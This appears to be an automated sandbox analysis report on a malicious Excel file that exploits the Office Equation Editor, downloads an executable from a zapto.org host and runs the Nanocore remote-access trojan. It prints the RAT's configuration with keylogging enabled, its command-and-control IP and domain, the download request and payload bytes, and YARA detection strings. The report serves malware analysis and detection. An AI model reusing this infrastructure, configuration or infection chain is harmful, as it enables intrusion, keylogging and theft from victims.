Loading ...

Play interactive tourEdit tour

Analysis Report Original title deed.xlsx

Overview

General Information

Sample Name:Original title deed.xlsx
Analysis ID:402852
MD5:ef302d177adde99f0a6f2e8a6bc9eda1
SHA1:ebc1e702f7334f162571ae83a4810fd870766ee3
SHA256:caf4f0b64bd425c3e04a28606b54a98b4eed7deb03ca7091ad148fddfbc297a8
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Writes many files with high entropy
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality for read data from the clipboard
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2400 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2500 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2780 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
      • MSBuild.exe (PID: 2764 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
      • vbc.exe (PID: 2868 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
        • MSBuild.exe (PID: 2872 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
        • vbc.exe (PID: 2804 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
          • MSBuild.exe (PID: 2524 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
          • vbc.exe (PID: 2388 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
            • MSBuild.exe (PID: 3060 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
            • vbc.exe (PID: 1620 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
              • MSBuild.exe (PID: 552 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
              • vbc.exe (PID: 2272 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                • MSBuild.exe (PID: 1688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                • vbc.exe (PID: 1840 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                  • MSBuild.exe (PID: 620 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                  • vbc.exe (PID: 1192 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                    • MSBuild.exe (PID: 592 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                    • vbc.exe (PID: 2320 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                      • MSBuild.exe (PID: 2300 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                      • vbc.exe (PID: 1888 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                        • MSBuild.exe (PID: 2104 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                        • vbc.exe (PID: 2252 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                          • MSBuild.exe (PID: 2384 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                          • vbc.exe (PID: 2644 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                            • MSBuild.exe (PID: 2448 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                            • vbc.exe (PID: 2688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                              • MSBuild.exe (PID: 2544 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                              • vbc.exe (PID: 2404 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                                • MSBuild.exe (PID: 2324 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                                • vbc.exe (PID: 2444 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                                  • MSBuild.exe (PID: 2472 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                                  • vbc.exe (PID: 2460 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": ".0.0.0,", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfcf5:$a: NanoCore
    • 0xfd05:$a: NanoCore
    • 0xff39:$a: NanoCore
    • 0xff4d:$a: NanoCore
    • 0xff8d:$a: NanoCore
    • 0xfd54:$b: ClientPlugin
    • 0xff56:$b: ClientPlugin
    • 0xff96:$b: ClientPlugin
    • 0xfe7b:$c: ProjectData
    • 0x10882:$d: DESCrypto
    • 0x1824e:$e: KeepAlive
    • 0x1623c:$g: LogClientMessage
    • 0x12437:$i: get_Connected
    • 0x10bb8:$j: #=q
    • 0x10be8:$j: #=q
    • 0x10c04:$j: #=q
    • 0x10c34:$j: #=q
    • 0x10c50:$j: #=q
    • 0x10c6c:$j: #=q
    • 0x10c9c:$j: #=q
    • 0x10cb8:$j: #=q
    0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 134 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      24.2.vbc.exe.2760000.6.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      24.2.vbc.exe.2760000.6.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      24.2.vbc.exe.2760000.6.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        24.2.vbc.exe.2760000.6.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xfef5:$a: NanoCore
        • 0xff05:$a: NanoCore
        • 0x10139:$a: NanoCore
        • 0x1014d:$a: NanoCore
        • 0x1018d:$a: NanoCore
        • 0xff54:$b: ClientPlugin
        • 0x10156:$b: ClientPlugin
        • 0x10196:$b: ClientPlugin
        • 0x1007b:$c: ProjectData
        • 0x10a82:$d: DESCrypto
        • 0x1844e:$e: KeepAlive
        • 0x1643c:$g: LogClientMessage
        • 0x12637:$i: get_Connected
        • 0x10db8:$j: #=q
        • 0x10de8:$j: #=q
        • 0x10e04:$j: #=q
        • 0x10e34:$j: #=q
        • 0x10e50:$j: #=q
        • 0x10e6c:$j: #=q
        • 0x10e9c:$j: #=q
        • 0x10eb8:$j: #=q
        20.2.vbc.exe.2760000.6.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        Click to see the 67 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.45.28, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2500, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2500, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus detection for URL or domainShow sources
        Source: http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exeAvira URL Cloud: Label: phishing
        Found malware configurationShow sources
        Source: 24.2.vbc.exe.2760000.6.raw.unpackMalware Configuration Extractor: NanoCore {"Version": ".0.0.0,", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8"}
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY
        Source: Yara matchFile source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exeJoe Sandbox ML: detected
        Source: 8.2.vbc.exe.2860000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 23.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 13.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.2.vbc.exe.2830000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 5.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 15.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 14.2.vbc.exe.2860000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 30.2.vbc.exe.2830000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 20.2.vbc.exe.27f0000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 28.2.vbc.exe.2940000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 24.2.vbc.exe.27f0000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 21.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 27.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 29.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 22.2.vbc.exe.2850000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 25.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 26.2.vbc.exe.27e0000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 7.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 4.2.vbc.exe.30a0000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 31.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 12.2.vbc.exe.1f10000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 9.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.2150153409.0000000003270000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.2167801125.0000000002900000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.2179925246.00000000029C0000.00000004.00000001.sdmp, vbc.exe, 0000000A.00000003.2191624487.0000000002860000.00000004.00000001.sdmp
        Source: C:\Users\Public\vbc.exeCode function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0040659C FindFirstFileA,FindClose,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,
        Source: global trafficDNS query: name: myhostisstillgood11.zapto.org
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.245.45.28:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.245.45.28:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: 79.134.225.26
        Source: Malware configuration extractorURLs: nassiru1166main.ddns.net
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 12:55:40 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Last-Modified: Mon, 03 May 2021 07:04:16 GMTETag: "923fb-5c16791e13768"Accept-Ranges: bytesContent-Length: 599035Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 d6 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 d0 01 00 00 04 00 00 61 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 84 00 00 a0 00 00 00 00 d0 02 00 c8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3c 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 74 12 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 a8 01 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 0b 00 00 00 d0 02 00 00 0c 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: Joe Sandbox ViewIP Address: 172.245.45.28 172.245.45.28
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: global trafficHTTP traffic detected: GET /dashboard/docs/images/nd.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: myhostisstillgood11.zapto.orgConnection: Keep-Alive
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B44CEF.emfJump to behavior
        Source: global trafficHTTP traffic detected: GET /dashboard/docs/images/nd.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: myhostisstillgood11.zapto.orgConnection: Keep-Alive
        Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: unknownDNS traffic detected: queries for: myhostisstillgood11.zapto.org
